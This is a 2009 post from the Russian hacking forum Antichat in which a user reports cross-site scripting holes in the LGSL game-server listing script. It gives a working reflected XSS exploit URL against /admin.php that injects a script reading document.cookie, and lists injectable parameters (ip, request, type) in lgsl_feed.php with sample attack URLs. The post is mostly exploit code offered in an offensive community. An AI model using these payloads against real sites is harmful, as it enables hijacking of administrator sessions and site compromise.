27.06.2009, 01:00
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
мигом посмотрел..
XSS
/admin.php
Код:
<form method='post' action='{$_SERVER['PHP_SELF']}' id='lgsl_admin_auth'>
exploit:
Код:
/admin.php/'><script>alert(document.cookie);</script>
работает только в админа, из-за проверки
p.s.:
2. pXSS
в lgsl_feed.php ксс можно произвести не только через п-тр type , но и через ip и через request
Код:
/lgsl/lgsl_files/lgsl_feed.php?type=1&ip=<hr>&c_port=3&q_port=4&s_port=5&request=6&xml=7
/lgsl/lgsl_files/lgsl_feed.php?type=ut&ip=2&c_port=3&q_port=4&s_port=5&request=<hr>
Последний раз редактировалось eLWAux; 27.06.2009 в 01:08..
|
|
|